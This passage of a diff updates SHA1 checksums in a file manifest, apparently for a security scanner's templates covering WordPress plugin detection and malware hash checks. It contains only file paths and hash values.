+file/malware/hash/powerstar-malware-hash.yaml:b1dae0703f67f8c8d7b013687fb5a6b776192900 +file/malware/hash/purplewave-malware-hash.yaml:4fa053d77fbcc0590656ffac1f8223dce12a4420 +file/malware/hash/red-leaves-malware-hash.yaml:f8f0b24847246e20aa9bceefe02e2fad940a6e66 +file/malware/hash/regeorg-webshell-hash.yaml:3b37f461bfcefbcb0c81d03fab96295456bf5f2a +file/malware/hash/revil-ransomware-hash.yaml:c79bfdbeea825f51a3c1e52768c48e02f197b5d5 +file/malware/hash/rokrat-malware-hash.yaml:6aa086d47148b9abb0075fbe1f39eb24b552b18d +file/malware/hash/sauron-malware-hash.yaml:ba6ad6e4659c5250b159a3513107e3b458d0cc7a +file/malware/hash/seaduke-malware-hash.yaml:935de90d644686ad270d5ad8bd43a54916e213f9 +file/malware/hash/sfx1-malware-hash.yaml:94f89690d19fa10b9e13d6140af359485918a85e +file/malware/hash/sfxrar-acrotray-malware-hash.yaml:fdcc260991bc3ed12e0566268d71b0163010b68b +file/malware/hash/sharpext-malware-hash.yaml:1429e0f3945825a0d22233cff4324d3f26ccf072 +file/malware/hash/sofacy-Winexe-malware-hash.yaml:00af831740958fab0caeb02328c44cd5634404fc +file/malware/hash/sofacy-bundestag-malware-hash.yaml:6466262d1c892f4164698e994821b6d8c8fec552 +file/malware/hash/sofacy-fybis-malware-hash.yaml:d1c0cabea022ae7879fd07c4baf0736d5d8f8b94 +file/malware/hash/tidepool-malware-hash.yaml:97eb0160af7840836d232b97dcde0338051142ef +file/malware/hash/turla-malware-hash.yaml:1b3af3412c8f58e030b8ef4d99b1ddfeb25711df +file/malware/hash/unit78020-malware-hash.yaml:cd2661f5ae9b5196db45cdd7806b35a177889e77 file/malware/hash/upstyle-malware-hash.yaml:97dd29d1157acde770bd48f12fcf721fc1f828f6 -file/malware/hash/wildneutron-malware-hash.yaml:0ec84ed19d87c0b6859492f557a4cf9eea0e0b1a +file/malware/hash/wildneutron-malware-hash.yaml:ec0b7f268c19239dc1dbb1f4a93f902921a03381 file/malware/hawkeye-malware.yaml:7cfd7dcaa71a7e08f27724e24f49c8d9c8e60315 file/malware/hydracrypt-malware.yaml:8924311d2a7dff9d3a6b8f5d3fd0c294604f48a9 file/malware/imminent-malware.yaml:6443426fde4dc82ce34a2239251726cc95e8fa44 @@ -769,7 +769,7 @@ helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d helpers/wordpress/plugins/google-analytics-for-wordpress.txt:ba46cbfd15f3e265cd93b9b01e7e97a6fbfa3a14 helpers/wordpress/plugins/google-listings-and-ads.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 helpers/wordpress/plugins/google-site-kit.txt:b112d64c12ea14bbfa5671fe7ac7af8d575b1e0b -helpers/wordpress/plugins/google-sitemap-generator.txt:5b10aa0446ed4db0d92e61d502b9ac9a6d6563e7 +helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:b6e10b645f3ab7a7a9d011ad1601bf695ace86af helpers/wordpress/plugins/happy-elementor-addons.txt:8365908e3026803300d1009572fe7bf474d0927b @@ -790,10 +790,10 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:d8521792e123691f48a1df559885c477069c6c1d helpers/wordpress/plugins/jetpack.txt:a861c6358fded34510ab1962eb66230220d77942 -helpers/wordpress/plugins/kadence-blocks.txt:45effb36b85fab8162ce999d16a2e5e6a286f313 +helpers/wordpress/plugins/kadence-blocks.txt:88e08e0e9092f4e08e09cd001ea68a3e37a33e66 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:1b4bbc3fd21af919b4e3c0a4dc7f4505c98735d5 +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b23093a06a6e8607146c2380c helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff helpers/wordpress/plugins/loco-translate.txt:0aa5278ef5ea1dbf030f22ea213474a6ac406d64 @@ -810,7 +810,7 @@ helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 helpers/wordpress/plugins/meta-box.txt:193731126fc28e1c2848ea069e492a3a46c5fcf4 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 -helpers/wordpress/plugins/newsletter.txt:d65b7f11924aba386b754c66ffada0aae0642b22 +helpers/wordpress/plugins/newsletter.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 helpers/wordpress/plugins/ninja-forms.txt:a16cd18f1019f04b207109b189b504edbde41ab2 @@ -833,7 +833,7 @@ helpers/wordpress/plugins/post-types-order.txt:f243f3446bb1226eacba3cdb8b904ef72 helpers/wordpress/plugins/premium-addons-for-elementor.txt:167005dc36e245ab157aa813a088cff941fda8d5 helpers/wordpress/plugins/pretty-link.txt:e45ae12a7326100f6ce5fbc5ad2c1260c5d71d13 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec -helpers/wordpress/plugins/really-simple-ssl.txt:d99db0a3dd6b78893c0a445c767ef7a576dce7ab +helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 @@ -891,14 +891,14 @@ helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 helpers/wordpress/plugins/wordpress-seo.txt:09c7dcd2ea357796d879b24eb2600e9964417379 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-fastest-cache.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 +helpers/wordpress/plugins/wp-fastest-cache.txt:0489698a3b78229a8b5df0f360850ce63827cf67 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 helpers/wordpress/plugins/wp-mail-smtp.txt:9a0a06f6eb18bf496057acce15162dc100f43480 helpers/wordpress/plugins/wp-maintenance-mode.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-migrate-db.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd -helpers/wordpress/plugins/wp-optimize.txt:f85383fcd7c211714084d7fca897998d7d759c5d +helpers/wordpress/plugins/wp-optimize.txt:1ee09476b338ca8261ad83be6aefa18693436588 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:99d481ff0df2b58220e9d619c86ddce4d61e9726 @@ -912,7 +912,7 @@ helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f1 helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a helpers/wordpress/plugins/wpforms-lite.txt:62156312501df259d1213db5481c36daaa321adc -helpers/wordpress/plugins/wps-hide-login.txt:245d85e4cf834057b5214fa088b67dda2c1ac360 +helpers/wordpress/plugins/wps-hide-login.txt:0a6497b3debb49e99679808d2c227d762982f1ae helpers/wordpress/plugins/wpvivid-backuprestore.txt:59d7e64657a8b97484f080d8c51a6652e22d2a14 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:bac19d8941e404675dba7142fecdc9ea1f371ad9 @@ -7183,227 +7183,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:b3d7616fd31257d474679ca37a41996d4bedc532 -http/technologies/wordpress/plugins/add-to-any.yaml:c9fcf9f4160bd82dba7094694eb45003cbfce3a2 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:2a3371bd4fa70dcd56db99dd9207e1f6c7ca3f41 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:ae285f7dcbc8fa81301d1b04b2ec7ffd5a4664c5 -http/technologies/wordpress/plugins/akismet.yaml:2fe78615872f84f30bb3ee5b65a7428ef55862f2 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:2538976db522947ec22504fb1adcef04a919a9a0 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:b63e9a23b264c499e3a9b6f3352e7b83cefb6c4e -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:ccfec0a329458f1e079356d3ea61bb99e1865fb7 -http/technologies/wordpress/plugins/amp.yaml:08ccac408309c3818206141027a03161e9408711 -http/technologies/wordpress/plugins/antispam-bee.yaml:aee910670492376b85aa62d0caf838738b90160f -http/technologies/wordpress/plugins/astra-sites.yaml:33f2e9420ba703459e5dbd682eacaefb6fbd640f +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:4b53509bd734b58620972a0963acb3b3468ee418 -http/technologies/wordpress/plugins/backwpup.yaml:7a3921d87d273067ce762612220dd99be7d68e63 -http/technologies/wordpress/plugins/better-search-replace.yaml:aea43a162f70e01a2f9a15cf6825d8ae10324349 -http/technologies/wordpress/plugins/better-wp-security.yaml:a3269328cb7c2936eae164e892a6fccb3b0809b4 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:f792d6481f905fa53fe7810be4c150dabd59f12a -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:98d54d404b363f5feca0ffef7dc1f1ea4906aab1 -http/technologies/wordpress/plugins/breeze.yaml:2e4c6b008ff66ce6d029e6fc39a8553c7f99fb55 -http/technologies/wordpress/plugins/broken-link-checker.yaml:5da1626717fb00dbee41987a5db4d197759ded62 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:bf8d3c6c6de76da5aa40f0cb0100b1b92e87f26b -http/technologies/wordpress/plugins/classic-editor.yaml:e953c812d82e6de32b15fc9b3a278aaa6c602928 -http/technologies/wordpress/plugins/classic-widgets.yaml:e247d9108451fd222157ee61d6fbd4c80b79447b -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:dc106890e172dc2d16ece701f303615378d36b66 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:03a36d4b749ffe5c9b2a6782397b3363cf878304 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:5128485c1b9d932abf6c476a33977855fe98d97e -http/technologies/wordpress/plugins/coblocks.yaml:44d23b03ea0a3e27c072a791d60547aeb9458bc1 -http/technologies/wordpress/plugins/code-snippets.yaml:e8068068950129712bc1cf34caaaa50115c13d11 -http/technologies/wordpress/plugins/coming-soon.yaml:8bdc6e4bf88ad3a8f168977f58d098d539fecd02 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:d6d98fdf51761f8ec19675e6d7f646ac8813c11e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:5d9dbe92dfeb5557926964381918a81f3617edb9 -http/technologies/wordpress/plugins/contact-form-7.yaml:a0a8090ffb4230ef0d304cc2b923c042397e2dbe -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:8e89b80e20152966ea3cc26410ec4fcdbbe8eb8f -http/technologies/wordpress/plugins/cookie-law-info.yaml:2e449d46553c537823542009a4fde4b734ee40ed -http/technologies/wordpress/plugins/cookie-notice.yaml:9e8ff2bf8482dbd852c9365e49b2b46bf73305eb -http/technologies/wordpress/plugins/copy-delete-posts.yaml:29ec284e0c013df0bd10648d2ba15fd995a0a269 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:618de5b95f3e730d13929f6f32f5fdec4e8812e1 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:52c5cedf7266da80073d290b8416764bbe94620c -http/technologies/wordpress/plugins/custom-css-js.yaml:5b2ce9d87268b2acc343b20a1bc6d8096af11be5 -http/technologies/wordpress/plugins/custom-fonts.yaml:374f3b2082b559715f2c2a461ed25494f4a88d7b -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:21a6eb257a6989d6fe764ce0fee8b4721def1dc8 -http/technologies/wordpress/plugins/disable-comments.yaml:e6f2bafddd0f113edb3e8b18786b16d487eabddf -http/technologies/wordpress/plugins/disable-gutenberg.yaml:2d570dea9ecdf731e0ca18e88a73fe46491e9d26 -http/technologies/wordpress/plugins/duplicate-page.yaml:b201f066f3039fbfbbae79baa3df5f4fe31e3d1b -http/technologies/wordpress/plugins/duplicate-post.yaml:0c794bd083df075bcc4d54c1998aba8cefa5168e -http/technologies/wordpress/plugins/duplicator.yaml:bed5dbb79d77384d5ea23e8d51397accb7f9625c -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:733840cd7e4bbea24d48ee9d7bb71f0700bb6ce6 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:f4b5da62ed02982e01bc3039c3e15be94a167341 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b6b11e5617051924a10baa40f95e493359ca3d4f -http/technologies/wordpress/plugins/elementor.yaml:f4edefb4f8ca9185b46d73e0b732b37d56bd1dd2 -http/technologies/wordpress/plugins/elementskit-lite.yaml:7614826894e92dc95bd95b82fc0f6cdce3abe5cb -http/technologies/wordpress/plugins/enable-media-replace.yaml:4cf1821cf2a5a59f7e60df144faf9c60ba9b6e94 -http/technologies/wordpress/plugins/envato-elements.yaml:94065f5a84f5321046be551485213d3c5c63976a -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:f14043884c8205abbc3e70a286cc25f71b9abb5d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b4190a0f9df8514c19dbe8d487942213aa9fc49d -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:a6ba1f1a0608eac090bcf6de84262f610a85e68b -http/technologies/wordpress/plugins/fast-indexing-api.yaml:47b1fbf4dd2cd2f171a3d3e24b6ca31253ca821e -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:0f43c2d8cc7ef1cd1020753992a9024297e31b5b -http/technologies/wordpress/plugins/flamingo.yaml:2e5e7062cc8c4d2c01d6e3d3b7ff93401aa4eb65 -http/technologies/wordpress/plugins/fluentform.yaml:a815ca53606dea0a793024389b4aa2948a8751df -http/technologies/wordpress/plugins/font-awesome.yaml:ad3d904ee116447a49b3a319b67529c7b7c346d3 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:b28c7006d5f707e7541b6c0d43c854a18696def8 -http/technologies/wordpress/plugins/formidable.yaml:ebb5b90b1dacabf4bd11571c616d61706fdd24b2 -http/technologies/wordpress/plugins/forminator.yaml:a7b8ae5058293a734030a6c6c195f41f2ea00d9f -http/technologies/wordpress/plugins/ga-google-analytics.yaml:4ba5366536a1ab35f5fb63f7a0224b9798a966e4 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:be003aaaa9879ba69f0db8793276b71377af2575 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:1978e15fe77dbcfa34ba21dc6302b3a07b948468 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:e0b9cac91da2b5860fed56a7b4f3c6dc30e4c2f9 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:fd8daa309455226ef6b65989fea8cbaf2e81eb13 -http/technologies/wordpress/plugins/google-site-kit.yaml:833558144003842dd23fd8f3c72d22c5b8bc0e79 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:3fc4b98979519856b73d63d8333f64ff41349635 -http/technologies/wordpress/plugins/gtranslate.yaml:e12c291af670cc0eb3779122933e06202045bc30 -http/technologies/wordpress/plugins/gutenberg.yaml:c833d5630c1b058d7d9a44032845354f70d31b72 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:416ecfa2bb058efb203aa7e90a9f258bfb2bde85 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:59edf3b89ad82ab61f39126342d4989608073055 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:5170d3827f4a8b8b479ec237ccb452a623d8f7fd -http/technologies/wordpress/plugins/header-footer.yaml:2ae48585ed4c1165d6ad81bd1f6f7d59d3513954 -http/technologies/wordpress/plugins/health-check.yaml:77ad7cbc5ee2680cad3f611d966e136af0b926cb -http/technologies/wordpress/plugins/hello-dolly.yaml:701433e5674c850940b215ee57921c8c3470de2c -http/technologies/wordpress/plugins/host-webfonts-local.yaml:94e0c3e02b86ae2f03e3c7db67832b6129d2551b -http/technologies/wordpress/plugins/hostinger.yaml:2a1f986c21a4b8b924e5278f5e8ce24a7f1d0945 -http/technologies/wordpress/plugins/image-optimization.yaml:7a784c85552acc5dcc36c4024f5820264c0134f2 -http/technologies/wordpress/plugins/imagify.yaml:a4893fcc8793efc8a0cbdd787eaed21cb5e88764 -http/technologies/wordpress/plugins/imsanity.yaml:2fcb947b41b1338ac47167f128d6792e8a571cba -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:da0b89dcdf3ed67e75d6a5e6f741dbd7817ad145 -http/technologies/wordpress/plugins/instagram-feed.yaml:6e6451ce4e9a77154ff684b75a6b981d2ebf18c6 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:3aed86182c5f4bf9c680ddd4a693b3f97024ebe1 -http/technologies/wordpress/plugins/iwp-client.yaml:03c3b5b748ec92a6a189d126aa4a4937805a609f -http/technologies/wordpress/plugins/jetpack-boost.yaml:2d514e702843fe225f98b170c08aa60c3911199f -http/technologies/wordpress/plugins/jetpack.yaml:818375d4703513e2fe3c72ed25b2539a8fcd6989 -http/technologies/wordpress/plugins/kadence-blocks.yaml:3d0a6546bd680797472567d621055aa8a52f5d60 -http/technologies/wordpress/plugins/kirki.yaml:0be53e6e09fdbd5fae315252b736a6c04273a035 -http/technologies/wordpress/plugins/leadin.yaml:c9bad5d8266d0a85e78e97de9d047047b42aea98 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:8d71e25eb8d91c5be350267c4d3d6305a1e4dd01 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:71a351dc259b8a32f3f1c02d4963fc96e3f8ae2e -http/technologies/wordpress/plugins/litespeed-cache.yaml:0d13c426f2ee2c0a9f2c9b9d00092d566656e1d8 -http/technologies/wordpress/plugins/loco-translate.yaml:752b781422374a28e28dd903f615bbcc75f8ad98 -http/technologies/wordpress/plugins/loginizer.yaml:84ea45d7007b9cdb260f2eb0674ee1450f1ee9cd +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 +http/technologies/wordpress/plugins/image-optimization.yaml:fd00671fcb1a927454714d707e89e62b40f6a329 +http/technologies/wordpress/plugins/imagify.yaml:b82e202b7774603cc5dfc671f09e78399cd6a82b 